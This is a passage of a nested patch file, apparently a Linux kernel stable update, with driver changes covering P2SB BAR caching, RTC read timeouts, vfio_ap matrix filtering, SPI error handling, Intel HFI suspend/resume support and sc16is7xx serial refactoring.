+ 	struct pci_dev *pdev;
+-	int ret;
+ 
+ 	pdev = pci_scan_single_device(bus, devfn);
+ 	if (!pdev)
+-		return -ENODEV;
++		return;
+ 
+-	ret = p2sb_read_bar0(pdev, mem);
++	p2sb_read_bar0(pdev, &cache->res);
++	cache->bus_dev_id = bus->dev.id;
+ 
+ 	pci_stop_and_remove_bus_device(pdev);
+-	return ret;
+ }
+ 
+-/**
+- * p2sb_bar - Get Primary to Sideband (P2SB) bridge device BAR
+- * @bus: PCI bus to communicate with
+- * @devfn: PCI slot and function to communicate with
+- * @mem: memory resource to be filled in
+- *
+- * The BIOS prevents the P2SB device from being enumerated by the PCI
+- * subsystem, so we need to unhide and hide it back to lookup the BAR.
+- *
+- * if @bus is NULL, the bus 0 in domain 0 will be used.
+- * If @devfn is 0, it will be replaced by devfn of the P2SB device.
+- *
+- * Caller must provide a valid pointer to @mem.
+- *
+- * Locking is handled by pci_rescan_remove_lock mutex.
+- *
+- * Return:
+- * 0 on success or appropriate errno value on error.
+- */
+-int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
++static int p2sb_scan_and_cache(struct pci_bus *bus, unsigned int devfn)
++{
++	unsigned int slot, fn;
++
++	if (PCI_FUNC(devfn) == 0) {
++		/*
++		 * When function number of the P2SB device is zero, scan it and
++		 * other function numbers, and if devices are available, cache
++		 * their BAR0s.
++		 */
++		slot = PCI_SLOT(devfn);
++		for (fn = 0; fn < NR_P2SB_RES_CACHE; fn++)
++			p2sb_scan_and_cache_devfn(bus, PCI_DEVFN(slot, fn));
++	} else {
++		/* Scan the P2SB device and cache its BAR0 */
++		p2sb_scan_and_cache_devfn(bus, devfn);
++	}
++
++	if (!p2sb_valid_resource(&p2sb_resources[PCI_FUNC(devfn)].res))
++		return -ENOENT;
++
++	return 0;
++}
++
++static struct pci_bus *p2sb_get_bus(struct pci_bus *bus)
++{
++	static struct pci_bus *p2sb_bus;
++
++	bus = bus ?: p2sb_bus;
++	if (bus)
++		return bus;
++
++	/* Assume P2SB is on the bus 0 in domain 0 */
++	p2sb_bus = pci_find_bus(0, 0);
++	return p2sb_bus;
++}
++
++static int p2sb_cache_resources(void)
+ {
+-	struct pci_dev *pdev_p2sb;
+ 	unsigned int devfn_p2sb;
+ 	u32 value = P2SBC_HIDE;
++	struct pci_bus *bus;
++	u16 class;
+ 	int ret;
+ 
+ 	/* Get devfn for P2SB device itself */
+@@ -106,8 +146,17 @@ int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* if @bus is NULL, use bus 0 in domain 0 */
+-	bus = bus ?: pci_find_bus(0, 0);
++	bus = p2sb_get_bus(NULL);
++	if (!bus)
++		return -ENODEV;
++
++	/*
++	 * When a device with same devfn exists and its device class is not
++	 * PCI_CLASS_MEMORY_OTHER for P2SB, do not touch it.
++	 */
++	pci_bus_read_config_word(bus, devfn_p2sb, PCI_CLASS_DEVICE, &class);
++	if (!PCI_POSSIBLE_ERROR(class) && class != PCI_CLASS_MEMORY_OTHER)
++		return -ENODEV;
+ 
+ 	/*
+ 	 * Prevent concurrent PCI bus scan from seeing the P2SB device and
+@@ -115,17 +164,16 @@ int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
+ 	 */
+ 	pci_lock_rescan_remove();
+ 
+-	/* Unhide the P2SB device, if needed */
++	/*
++	 * The BIOS prevents the P2SB device from being enumerated by the PCI
++	 * subsystem, so we need to unhide and hide it back to lookup the BAR.
++	 * Unhide the P2SB device here, if needed.
++	 */
+ 	pci_bus_read_config_dword(bus, devfn_p2sb, P2SBC, &value);
+ 	if (value & P2SBC_HIDE)
+ 		pci_bus_write_config_dword(bus, devfn_p2sb, P2SBC, 0);
+ 
+-	pdev_p2sb = pci_scan_single_device(bus, devfn_p2sb);
+-	if (devfn)
+-		ret = p2sb_scan_and_read(bus, devfn, mem);
+-	else
+-		ret = p2sb_read_bar0(pdev_p2sb, mem);
+-	pci_stop_and_remove_bus_device(pdev_p2sb);
++	ret = p2sb_scan_and_cache(bus, devfn_p2sb);
+ 
+ 	/* Hide the P2SB device, if it was hidden */
+ 	if (value & P2SBC_HIDE)
+@@ -133,12 +181,62 @@ int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
+ 
+ 	pci_unlock_rescan_remove();
+ 
+-	if (ret)
+-		return ret;
++	return ret;
++}
++
++/**
++ * p2sb_bar - Get Primary to Sideband (P2SB) bridge device BAR
++ * @bus: PCI bus to communicate with
++ * @devfn: PCI slot and function to communicate with
++ * @mem: memory resource to be filled in
++ *
++ * If @bus is NULL, the bus 0 in domain 0 will be used.
++ * If @devfn is 0, it will be replaced by devfn of the P2SB device.
++ *
++ * Caller must provide a valid pointer to @mem.
++ *
++ * Return:
++ * 0 on success or appropriate errno value on error.
++ */
++int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
++{
++	struct p2sb_res_cache *cache;
++	int ret;
++
++	bus = p2sb_get_bus(bus);
++	if (!bus)
++		return -ENODEV;
++
++	if (!devfn) {
++		ret = p2sb_get_devfn(&devfn);
++		if (ret)
++			return ret;
++	}
+ 
+-	if (mem->flags == 0)
++	cache = &p2sb_resources[PCI_FUNC(devfn)];
++	if (cache->bus_dev_id != bus->dev.id)
+ 		return -ENODEV;
+ 
++	if (!p2sb_valid_resource(&cache->res))
++		return -ENOENT;
++
++	memcpy(mem, &cache->res, sizeof(*mem));
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(p2sb_bar);
++
++static int __init p2sb_fs_init(void)
++{
++	p2sb_cache_resources();
++	return 0;
++}
++
++/*
++ * pci_rescan_remove_lock to avoid access to unhidden P2SB devices can
++ * not be locked in sysfs pci bus rescan path because of deadlock. To
++ * avoid the deadlock, access to P2SB devices with the lock at an early
++ * step in kernel initialization and cache required resources. This
++ * should happen after subsys_initcall which initializes PCI subsystem
++ * and before device_initcall which requires P2SB resources.
++ */
++fs_initcall(p2sb_fs_init);
+diff --git a/drivers/rpmsg/virtio_rpmsg_bus.c b/drivers/rpmsg/virtio_rpmsg_bus.c
+index 905ac7910c98f..f1af0f6746150 100644
+--- a/drivers/rpmsg/virtio_rpmsg_bus.c
++++ b/drivers/rpmsg/virtio_rpmsg_bus.c
+@@ -378,6 +378,7 @@ static void virtio_rpmsg_release_device(struct device *dev)
+ 	struct rpmsg_device *rpdev = to_rpmsg_device(dev);
+ 	struct virtio_rpmsg_channel *vch = to_virtio_rpmsg_channel(rpdev);
+ 
++	kfree(rpdev->driver_override);
+ 	kfree(vch);
+ }
+ 
+diff --git a/drivers/rtc/rtc-cmos.c b/drivers/rtc/rtc-cmos.c
+index 00e2ca7374ecf..e0a798923ce0e 100644
+--- a/drivers/rtc/rtc-cmos.c
++++ b/drivers/rtc/rtc-cmos.c
+@@ -231,7 +231,7 @@ static int cmos_read_time(struct device *dev, struct rtc_time *t)
+ 	if (!pm_trace_rtc_valid())
+ 		return -EIO;
+ 
+-	ret = mc146818_get_time(t);
++	ret = mc146818_get_time(t, 1000);
+ 	if (ret < 0) {
+ 		dev_err_ratelimited(dev, "unable to read current time\n");
+ 		return ret;
+@@ -292,7 +292,7 @@ static int cmos_read_alarm(struct device *dev, struct rtc_wkalrm *t)
+ 
+ 	/* This not only a rtc_op, but also called directly */
+ 	if (!is_valid_irq(cmos->irq))
+-		return -EIO;
++		return -ETIMEDOUT;
+ 
+ 	/* Basic alarms only support hour, minute, and seconds fields.
+ 	 * Some also support day and month, for alarms up to a year in
+@@ -307,7 +307,7 @@ static int cmos_read_alarm(struct device *dev, struct rtc_wkalrm *t)
+ 	 *
+ 	 * Use the mc146818_avoid_UIP() function to avoid this.
+ 	 */
+-	if (!mc146818_avoid_UIP(cmos_read_alarm_callback, &p))
++	if (!mc146818_avoid_UIP(cmos_read_alarm_callback, 10, &p))
+ 		return -EIO;
+ 
+ 	if (!(p.rtc_control & RTC_DM_BINARY) || RTC_ALWAYS_BCD) {
+@@ -556,8 +556,8 @@ static int cmos_set_alarm(struct device *dev, struct rtc_wkalrm *t)
+ 	 *
+ 	 * Use mc146818_avoid_UIP() to avoid this.
+ 	 */
+-	if (!mc146818_avoid_UIP(cmos_set_alarm_callback, &p))
+-		return -EIO;
++	if (!mc146818_avoid_UIP(cmos_set_alarm_callback, 10, &p))
++		return -ETIMEDOUT;
+ 
+ 	cmos->alarm_expires = rtc_tm_to_time64(&t->time);
+ 
+@@ -818,18 +818,24 @@ static void rtc_wake_off(struct device *dev)
+ }
+ 
+ #ifdef CONFIG_X86
+-/* Enable use_acpi_alarm mode for Intel platforms no earlier than 2015 */
+ static void use_acpi_alarm_quirks(void)
+ {
+-	if (boot_cpu_data.x86_vendor != X86_VENDOR_INTEL)
++	switch (boot_cpu_data.x86_vendor) {
++	case X86_VENDOR_INTEL:
++		if (dmi_get_bios_year() < 2015)
++			return;
++		break;
++	case X86_VENDOR_AMD:
++	case X86_VENDOR_HYGON:
++		if (dmi_get_bios_year() < 2021)
++			return;
++		break;
++	default:
+ 		return;
+-
++	}
+ 	if (!is_hpet_enabled())
+ 		return;
+ 
+-	if (dmi_get_bios_year() < 2015)
+-		return;
+-
+ 	use_acpi_alarm = true;
+ }
+ #else
+diff --git a/drivers/rtc/rtc-mc146818-lib.c b/drivers/rtc/rtc-mc146818-lib.c
+index f1c09f1db044c..651bf3c279c74 100644
+--- a/drivers/rtc/rtc-mc146818-lib.c
++++ b/drivers/rtc/rtc-mc146818-lib.c
+@@ -8,26 +8,31 @@
+ #include <linux/acpi.h>
+ #endif
+ 
++#define UIP_RECHECK_DELAY		100	/* usec */
++#define UIP_RECHECK_DELAY_MS		(USEC_PER_MSEC / UIP_RECHECK_DELAY)
++#define UIP_RECHECK_LOOPS_MS(x)		(x / UIP_RECHECK_DELAY_MS)
++
+ /*
+  * Execute a function while the UIP (Update-in-progress) bit of the RTC is
+- * unset.
++ * unset. The timeout is configurable by the caller in ms.
+  *
+  * Warning: callback may be executed more then once.
+  */
+ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
++			int timeout,
+ 			void *param)
+ {
+ 	int i;
+ 	unsigned long flags;
+ 	unsigned char seconds;
+ 
+-	for (i = 0; i < 100; i++) {
++	for (i = 0; UIP_RECHECK_LOOPS_MS(i) < timeout; i++) {
+ 		spin_lock_irqsave(&rtc_lock, flags);
+ 
+ 		/*
+ 		 * Check whether there is an update in progress during which the
+ 		 * readout is unspecified. The maximum update time is ~2ms. Poll
+-		 * every 100 usec for completion.
++		 * for completion.
+ 		 *
+ 		 * Store the second value before checking UIP so a long lasting
+ 		 * NMI which happens to hit after the UIP check cannot make
+@@ -37,7 +42,7 @@ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
+ 
+ 		if (CMOS_READ(RTC_FREQ_SELECT) & RTC_UIP) {
+ 			spin_unlock_irqrestore(&rtc_lock, flags);
+-			udelay(100);
++			udelay(UIP_RECHECK_DELAY);
+ 			continue;
+ 		}
+ 
+@@ -56,7 +61,7 @@ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
+ 		 */
+ 		if (CMOS_READ(RTC_FREQ_SELECT) & RTC_UIP) {
+ 			spin_unlock_irqrestore(&rtc_lock, flags);
+-			udelay(100);
++			udelay(UIP_RECHECK_DELAY);
+ 			continue;
+ 		}
+ 
+@@ -72,6 +77,10 @@ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
+ 		}
+ 		spin_unlock_irqrestore(&rtc_lock, flags);
+ 
++		if (UIP_RECHECK_LOOPS_MS(i) >= 100)
++			pr_warn("Reading current time from RTC took around %li ms\n",
++				UIP_RECHECK_LOOPS_MS(i));
++
+ 		return true;
+ 	}
+ 	return false;
+@@ -84,7 +93,7 @@ EXPORT_SYMBOL_GPL(mc146818_avoid_UIP);
+  */
+ bool mc146818_does_rtc_work(void)
+ {
+-	return mc146818_avoid_UIP(NULL, NULL);
++	return mc146818_avoid_UIP(NULL, 1000, NULL);
+ }
+ EXPORT_SYMBOL_GPL(mc146818_does_rtc_work);
+ 
+@@ -130,15 +139,27 @@ static void mc146818_get_time_callback(unsigned char seconds, void *param_in)
+ 	p->ctrl = CMOS_READ(RTC_CONTROL);
+ }
+ 
+-int mc146818_get_time(struct rtc_time *time)
++/**
++ * mc146818_get_time - Get the current time from the RTC
++ * @time: pointer to struct rtc_time to store the current time
++ * @timeout: timeout value in ms
++ *
++ * This function reads the current time from the RTC and stores it in the
++ * provided struct rtc_time. The timeout parameter specifies the maximum
++ * time to wait for the RTC to become ready.
++ *
++ * Return: 0 on success, -ETIMEDOUT if the RTC did not become ready within
++ * the specified timeout, or another error code if an error occurred.
++ */
++int mc146818_get_time(struct rtc_time *time, int timeout)
+ {
+ 	struct mc146818_get_time_callback_param p = {
+ 		.time = time
+ 	};
+ 
+-	if (!mc146818_avoid_UIP(mc146818_get_time_callback, &p)) {
++	if (!mc146818_avoid_UIP(mc146818_get_time_callback, timeout, &p)) {
+ 		memset(time, 0, sizeof(*time));
+-		return -EIO;
++		return -ETIMEDOUT;
+ 	}
+ 
+ 	if (!(p.ctrl & RTC_DM_BINARY) || RTC_ALWAYS_BCD)
+diff --git a/drivers/s390/crypto/vfio_ap_ops.c b/drivers/s390/crypto/vfio_ap_ops.c
+index 934515959ebf4..0659aa2863ab0 100644
+--- a/drivers/s390/crypto/vfio_ap_ops.c
++++ b/drivers/s390/crypto/vfio_ap_ops.c
+@@ -425,6 +425,7 @@ static struct ap_queue_status vfio_ap_irq_enable(struct vfio_ap_queue *q,
+ 		VFIO_AP_DBF_WARN("%s: gisc registration failed: nisc=%d, isc=%d, apqn=%#04x\n",
+ 				 __func__, nisc, isc, q->apqn);
+ 
++		vfio_unpin_pages(&q->matrix_mdev->vdev, nib, 1);
+ 		status.response_code = AP_RESPONSE_INVALID_GISA;
+ 		return status;
+ 	}
+@@ -638,8 +639,7 @@ static bool vfio_ap_mdev_filter_cdoms(struct ap_matrix_mdev *matrix_mdev)
+  * Return: a boolean value indicating whether the KVM guest's APCB was changed
+  *	   by the filtering or not.
+  */
+-static bool vfio_ap_mdev_filter_matrix(unsigned long *apm, unsigned long *aqm,
+-				       struct ap_matrix_mdev *matrix_mdev)
++static bool vfio_ap_mdev_filter_matrix(struct ap_matrix_mdev *matrix_mdev)
+ {
+ 	unsigned long apid, apqi, apqn;
+ 	DECLARE_BITMAP(prev_shadow_apm, AP_DEVICES);
+@@ -660,8 +660,9 @@ static bool vfio_ap_mdev_filter_matrix(unsigned long *apm, unsigned long *aqm,
+ 	bitmap_and(matrix_mdev->shadow_apcb.aqm, matrix_mdev->matrix.aqm,
+ 		   (unsigned long *)matrix_dev->info.aqm, AP_DOMAINS);
+ 
+-	for_each_set_bit_inv(apid, apm, AP_DEVICES) {
+-		for_each_set_bit_inv(apqi, aqm, AP_DOMAINS) {
++	for_each_set_bit_inv(apid, matrix_mdev->shadow_apcb.apm, AP_DEVICES) {
++		for_each_set_bit_inv(apqi, matrix_mdev->shadow_apcb.aqm,
++				     AP_DOMAINS) {
+ 			/*
+ 			 * If the APQN is not bound to the vfio_ap device
+ 			 * driver, then we can't assign it to the guest's
+@@ -930,7 +931,6 @@ static ssize_t assign_adapter_store(struct device *dev,
+ {
+ 	int ret;
+ 	unsigned long apid;
+-	DECLARE_BITMAP(apm_delta, AP_DEVICES);
+ 	struct ap_matrix_mdev *matrix_mdev = dev_get_drvdata(dev);
+ 
+ 	mutex_lock(&ap_perms_mutex);
+@@ -959,11 +959,8 @@ static ssize_t assign_adapter_store(struct device *dev,
+ 	}
+ 
+ 	vfio_ap_mdev_link_adapter(matrix_mdev, apid);
+-	memset(apm_delta, 0, sizeof(apm_delta));
+-	set_bit_inv(apid, apm_delta);
+ 
+-	if (vfio_ap_mdev_filter_matrix(apm_delta,
+-				       matrix_mdev->matrix.aqm, matrix_mdev))
++	if (vfio_ap_mdev_filter_matrix(matrix_mdev))
+ 		vfio_ap_mdev_update_guest_apcb(matrix_mdev);
+ 
+ 	ret = count;
+@@ -1139,7 +1136,6 @@ static ssize_t assign_domain_store(struct device *dev,
+ {
+ 	int ret;
+ 	unsigned long apqi;
+-	DECLARE_BITMAP(aqm_delta, AP_DOMAINS);
+ 	struct ap_matrix_mdev *matrix_mdev = dev_get_drvdata(dev);
+ 
+ 	mutex_lock(&ap_perms_mutex);
+@@ -1168,11 +1164,8 @@ static ssize_t assign_domain_store(struct device *dev,
+ 	}
+ 
+ 	vfio_ap_mdev_link_domain(matrix_mdev, apqi);
+-	memset(aqm_delta, 0, sizeof(aqm_delta));
+-	set_bit_inv(apqi, aqm_delta);
+ 
+-	if (vfio_ap_mdev_filter_matrix(matrix_mdev->matrix.apm, aqm_delta,
+-				       matrix_mdev))
++	if (vfio_ap_mdev_filter_matrix(matrix_mdev))
+ 		vfio_ap_mdev_update_guest_apcb(matrix_mdev);
+ 
+ 	ret = count;
+@@ -1858,11 +1851,22 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 	if (matrix_mdev) {
+ 		vfio_ap_mdev_link_queue(matrix_mdev, q);
+ 
+-		if (vfio_ap_mdev_filter_matrix(matrix_mdev->matrix.apm,
+-					       matrix_mdev->matrix.aqm,
+-					       matrix_mdev))
++		/*
++		 * If we're in the process of handling the adding of adapters or
++		 * domains to the host's AP configuration, then let the
++		 * vfio_ap device driver's on_scan_complete callback filter the
++		 * matrix and update the guest's AP configuration after all of
++		 * the new queue devices are probed.
++		 */
++		if (!bitmap_empty(matrix_mdev->apm_add, AP_DEVICES) ||
++		    !bitmap_empty(matrix_mdev->aqm_add, AP_DOMAINS))
++			goto done;
++
++		if (vfio_ap_mdev_filter_matrix(matrix_mdev))
+ 			vfio_ap_mdev_update_guest_apcb(matrix_mdev);
+ 	}
++
++done:
+ 	dev_set_drvdata(&apdev->device, q);
+ 	release_update_locks_for_mdev(matrix_mdev);
+ 
+@@ -2211,34 +2215,22 @@ void vfio_ap_on_cfg_changed(struct ap_config_info *cur_cfg_info,
+ 
+ static void vfio_ap_mdev_hot_plug_cfg(struct ap_matrix_mdev *matrix_mdev)
+ {
+-	bool do_hotplug = false;
+-	int filter_domains = 0;
+-	int filter_adapters = 0;
+-	DECLARE_BITMAP(apm, AP_DEVICES);
+-	DECLARE_BITMAP(aqm, AP_DOMAINS);
++	bool filter_domains, filter_adapters, filter_cdoms, do_hotplug = false;
+ 
+ 	mutex_lock(&matrix_mdev->kvm->lock);
+ 	mutex_lock(&matrix_dev->mdevs_lock);
+ 
+-	filter_adapters = bitmap_and(apm, matrix_mdev->matrix.apm,
+-				     matrix_mdev->apm_add, AP_DEVICES);
+-	filter_domains = bitmap_and(aqm, matrix_mdev->matrix.aqm,
+-				    matrix_mdev->aqm_add, AP_DOMAINS);
+-
+-	if (filter_adapters && filter_domains)
+-		do_hotplug |= vfio_ap_mdev_filter_matrix(apm, aqm, matrix_mdev);
+-	else if (filter_adapters)
+-		do_hotplug |=
+-			vfio_ap_mdev_filter_matrix(apm,
+-						   matrix_mdev->shadow_apcb.aqm,
+-						   matrix_mdev);
+-	else
+-		do_hotplug |=
+-			vfio_ap_mdev_filter_matrix(matrix_mdev->shadow_apcb.apm,
+-						   aqm, matrix_mdev);
++	filter_adapters = bitmap_intersects(matrix_mdev->matrix.apm,
++					    matrix_mdev->apm_add, AP_DEVICES);
++	filter_domains = bitmap_intersects(matrix_mdev->matrix.aqm,
++					   matrix_mdev->aqm_add, AP_DOMAINS);
++	filter_cdoms = bitmap_intersects(matrix_mdev->matrix.adm,
++					 matrix_mdev->adm_add, AP_DOMAINS);
++
++	if (filter_adapters || filter_domains)
++		do_hotplug = vfio_ap_mdev_filter_matrix(matrix_mdev);
+ 
+-	if (bitmap_intersects(matrix_mdev->matrix.adm, matrix_mdev->adm_add,
+-			      AP_DOMAINS))
++	if (filter_cdoms)
+ 		do_hotplug |= vfio_ap_mdev_filter_cdoms(matrix_mdev);
+ 
+ 	if (do_hotplug)
+diff --git a/drivers/spi/spi-bcm-qspi.c b/drivers/spi/spi-bcm-qspi.c
+index 137e7315a3cfd..b24955910147c 100644
+--- a/drivers/spi/spi-bcm-qspi.c
++++ b/drivers/spi/spi-bcm-qspi.c
+@@ -19,7 +19,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/slab.h>
+ #include <linux/spi/spi.h>
+-#include <linux/spi/spi-mem.h>
++#include <linux/mtd/spi-nor.h>
+ #include <linux/sysfs.h>
+ #include <linux/types.h>
+ #include "spi-bcm-qspi.h"
+@@ -1221,7 +1221,7 @@ static int bcm_qspi_exec_mem_op(struct spi_mem *mem,
+ 
+ 	/* non-aligned and very short transfers are handled by MSPI */
+ 	if (!IS_ALIGNED((uintptr_t)addr, 4) || !IS_ALIGNED((uintptr_t)buf, 4) ||
+-	    len < 4)
++	    len < 4 || op->cmd.opcode == SPINOR_OP_RDSFDP)
+ 		mspi_read = true;
+ 
+ 	if (!has_bspi(qspi) || mspi_read)
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 22d227878bc44..19688f333e0bc 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -1636,6 +1636,10 @@ static int __spi_pump_transfer_message(struct spi_controller *ctlr,
+ 			pm_runtime_put_noidle(ctlr->dev.parent);
+ 			dev_err(&ctlr->dev, "Failed to power device: %d\n",
+ 				ret);
++
++			msg->status = ret;
++			spi_finalize_current_message(ctlr);
++
+ 			return ret;
+ 		}
+ 	}
+diff --git a/drivers/thermal/intel/intel_hfi.c b/drivers/thermal/intel/intel_hfi.c
+index a0640f762dc5d..750dab3f259e4 100644
+--- a/drivers/thermal/intel/intel_hfi.c
++++ b/drivers/thermal/intel/intel_hfi.c
+@@ -24,6 +24,7 @@
+ #include <linux/bitops.h>
+ #include <linux/cpufeature.h>
+ #include <linux/cpumask.h>
++#include <linux/delay.h>
+ #include <linux/gfp.h>
+ #include <linux/io.h>
+ #include <linux/kernel.h>
+@@ -34,7 +35,9 @@
+ #include <linux/processor.h>
+ #include <linux/slab.h>
+ #include <linux/spinlock.h>
++#include <linux/suspend.h>
+ #include <linux/string.h>
++#include <linux/syscore_ops.h>
+ #include <linux/topology.h>
+ #include <linux/workqueue.h>
+ 
+@@ -338,6 +341,52 @@ static void init_hfi_instance(struct hfi_instance *hfi_instance)
+ 	hfi_instance->data = hfi_instance->hdr + hfi_features.hdr_size;
+ }
+ 
++/* Caller must hold hfi_instance_lock. */
++static void hfi_enable(void)
++{
++	u64 msr_val;
++
++	rdmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++	msr_val |= HW_FEEDBACK_CONFIG_HFI_ENABLE_BIT;
++	wrmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++}
++
++static void hfi_set_hw_table(struct hfi_instance *hfi_instance)
++{
++	phys_addr_t hw_table_pa;
++	u64 msr_val;
++
++	hw_table_pa = virt_to_phys(hfi_instance->hw_table);
++	msr_val = hw_table_pa | HW_FEEDBACK_PTR_VALID_BIT;
++	wrmsrl(MSR_IA32_HW_FEEDBACK_PTR, msr_val);
++}
++
++/* Caller must hold hfi_instance_lock. */
++static void hfi_disable(void)
++{
++	u64 msr_val;
++	int i;
++
++	rdmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++	msr_val &= ~HW_FEEDBACK_CONFIG_HFI_ENABLE_BIT;
++	wrmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++
++	/*
++	 * Wait for hardware to acknowledge the disabling of HFI. Some
++	 * processors may not do it. Wait for ~2ms. This is a reasonable
++	 * time for hardware to complete any pending actions on the HFI
++	 * memory.
++	 */
++	for (i = 0; i < 2000; i++) {
++		rdmsrl(MSR_IA32_PACKAGE_THERM_STATUS, msr_val);
++		if (msr_val & PACKAGE_THERM_STATUS_HFI_UPDATED)
++			break;
++
++		udelay(1);
++		cpu_relax();
++	}
++}
++
+ /**
+  * intel_hfi_online() - Enable HFI on @cpu
+  * @cpu:	CPU in which the HFI will be enabled
+@@ -355,8 +404,6 @@ void intel_hfi_online(unsigned int cpu)
+ {
+ 	struct hfi_instance *hfi_instance;
+ 	struct hfi_cpu_info *info;
+-	phys_addr_t hw_table_pa;
+-	u64 msr_val;
+ 	u16 die_id;
+ 
+ 	/* Nothing to do if hfi_instances are missing. */
+@@ -394,14 +441,16 @@ void intel_hfi_online(unsigned int cpu)
+ 	/*
+ 	 * Hardware is programmed with the physical address of the first page
+ 	 * frame of the table. Hence, the allocated memory must be page-aligned.
++	 *
++	 * Some processors do not forget the initial address of the HFI table
++	 * even after having been reprogrammed. Keep using the same pages. Do
++	 * not free them.
+ 	 */
+ 	hfi_instance->hw_table = alloc_pages_exact(hfi_features.nr_table_pages,
+ 						   GFP_KERNEL | __GFP_ZERO);
+ 	if (!hfi_instance->hw_table)
+ 		goto unlock;
+ 
+-	hw_table_pa = virt_to_phys(hfi_instance->hw_table);
+-
+ 	/*
+ 	 * Allocate memory to keep a local copy of the table that
+ 	 * hardware generates.
+@@ -411,16 +460,6 @@ void intel_hfi_online(unsigned int cpu)
+ 	if (!hfi_instance->local_table)
+ 		goto free_hw_table;
+ 
+-	/*
+-	 * Program the address of the feedback table of this die/package. On
+-	 * some processors, hardware remembers the old address of the HFI table
+-	 * even after having been reprogrammed and re-enabled. Thus, do not free
+-	 * the pages allocated for the table or reprogram the hardware with a
+-	 * new base address. Namely, program the hardware only once.
+-	 */
+-	msr_val = hw_table_pa | HW_FEEDBACK_PTR_VALID_BIT;
+-	wrmsrl(MSR_IA32_HW_FEEDBACK_PTR, msr_val);
+-
+ 	init_hfi_instance(hfi_instance);
+ 
+ 	INIT_DELAYED_WORK(&hfi_instance->update_work, hfi_update_work_fn);
+@@ -429,13 +468,8 @@ void intel_hfi_online(unsigned int cpu)
+ 
+ 	cpumask_set_cpu(cpu, hfi_instance->cpus);
+ 
+-	/*
+-	 * Enable the hardware feedback interface and never disable it. See
+-	 * comment on programming the address of the table.
+-	 */
+-	rdmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
+-	msr_val |= HW_FEEDBACK_CONFIG_HFI_ENABLE_BIT;
+-	wrmsrl(MSR_IA32_HW_FEEDBACK_CONFIG, msr_val);
++	hfi_set_hw_table(hfi_instance);
++	hfi_enable();
+ 
+ unlock:
+ 	mutex_unlock(&hfi_instance_lock);
+@@ -475,6 +509,10 @@ void intel_hfi_offline(unsigned int cpu)
+ 
+ 	mutex_lock(&hfi_instance_lock);
+ 	cpumask_clear_cpu(cpu, hfi_instance->cpus);
++
++	if (!cpumask_weight(hfi_instance->cpus))
++		hfi_disable();
++
+ 	mutex_unlock(&hfi_instance_lock);
+ }
+ 
+@@ -523,6 +561,30 @@ static __init int hfi_parse_features(void)
+ 	return 0;
+ }
+ 
++static void hfi_do_enable(void)
++{
++	/* This code runs only on the boot CPU. */
++	struct hfi_cpu_info *info = &per_cpu(hfi_cpu_info, 0);
++	struct hfi_instance *hfi_instance = info->hfi_instance;
++
++	/* No locking needed. There is no concurrency with CPU online. */
++	hfi_set_hw_table(hfi_instance);
++	hfi_enable();
++}
++
++static int hfi_do_disable(void)
++{
++	/* No locking needed. There is no concurrency with CPU offline. */
++	hfi_disable();
++
++	return 0;
++}
++
++static struct syscore_ops hfi_pm_ops = {
++	.resume = hfi_do_enable,
++	.suspend = hfi_do_disable,
++};
++
+ void __init intel_hfi_init(void)
+ {
+ 	struct hfi_instance *hfi_instance;
+@@ -554,6 +616,8 @@ void __init intel_hfi_init(void)
+ 	if (!hfi_updates_wq)
+ 		goto err_nomem;
+ 
++	register_syscore_ops(&hfi_pm_ops);
++
+ 	return;
+ 
+ err_nomem:
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index db33790e66754..e331b57d6d7d3 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -301,8 +301,8 @@
+ 
+ 
+ /* Misc definitions */
++#define SC16IS7XX_SPI_READ_BIT		BIT(7)
+ #define SC16IS7XX_FIFO_SIZE		(64)
+-#define SC16IS7XX_REG_SHIFT		2
+ #define SC16IS7XX_GPIOS_PER_BANK	4
+ 
+ struct sc16is7xx_devtype {
+@@ -323,7 +323,8 @@ struct sc16is7xx_one_config {
+ 
+ struct sc16is7xx_one {
+ 	struct uart_port		port;
+-	u8				line;
++	struct regmap			*regmap;
++	struct mutex			efr_lock; /* EFR registers access */
+ 	struct kthread_work		tx_work;
+ 	struct kthread_work		reg_work;
+ 	struct kthread_delayed_work	ms_work;
+@@ -334,7 +335,6 @@ struct sc16is7xx_one {
+ 
+ struct sc16is7xx_port {
+ 	const struct sc16is7xx_devtype	*devtype;
+-	struct regmap			*regmap;
+ 	struct clk			*clk;
+ #ifdef CONFIG_GPIOLIB
+ 	struct gpio_chip		gpio;
+@@ -344,7 +344,6 @@ struct sc16is7xx_port {
+ 	unsigned char			buf[SC16IS7XX_FIFO_SIZE];
+ 	struct kthread_worker		kworker;
+ 	struct task_struct		*kworker_task;
+-	struct mutex			efr_lock;
+ 	struct sc16is7xx_one		p[];
+ };
+ 
+@@ -362,48 +361,35 @@ static void sc16is7xx_stop_tx(struct uart_port *port);
+ #define to_sc16is7xx_port(p,e)	((container_of((p), struct sc16is7xx_port, e)))
+ #define to_sc16is7xx_one(p,e)	((container_of((p), struct sc16is7xx_one, e)))
+ 
+-static int sc16is7xx_line(struct uart_port *port)
+-{
+-	struct sc16is7xx_one *one = to_sc16is7xx_one(port, port);
+-
+-	return one->line;
+-}
+-
+ static u8 sc16is7xx_port_read(struct uart_port *port, u8 reg)
